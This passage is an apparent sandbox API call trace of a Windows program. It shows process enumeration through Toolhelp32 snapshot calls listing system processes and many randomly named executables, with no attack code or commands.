lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.145] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 
1 [0109.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="ajbehaviord.exe")) returned 1 [0109.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.167] CloseHandle (hObject=0xc4) returned 1 [0109.167] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.173] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.228] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.264] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 